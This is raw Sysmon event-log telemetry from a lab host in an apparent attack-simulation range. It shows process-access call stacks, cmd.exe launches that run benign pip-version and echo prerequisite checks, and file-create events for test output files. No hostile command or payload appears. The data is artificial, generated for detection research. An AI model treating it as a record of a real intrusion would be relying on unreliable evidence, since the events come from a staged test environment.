21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.123{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.123{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.123{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95
b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb1
1475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.128{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.108{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078
deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.086{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "echo "PIP must be installed manually"" 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 23542300x800000000000000025199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F4AEA5E4A3513648AE4E194BFD6E6D,SHA256=FF415477EBFC6E77A82301194670198A8623699B52BA2D3D581CF943E1FA9286,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 
23542300x800000000000000025196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txtMD5=39D3FD75AD0201BE7A221BC36B953867,SHA256=BE852674F1F7EF6D10A8446FD8F28403464C07ACA037668AD5A1E7697B4ABDB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 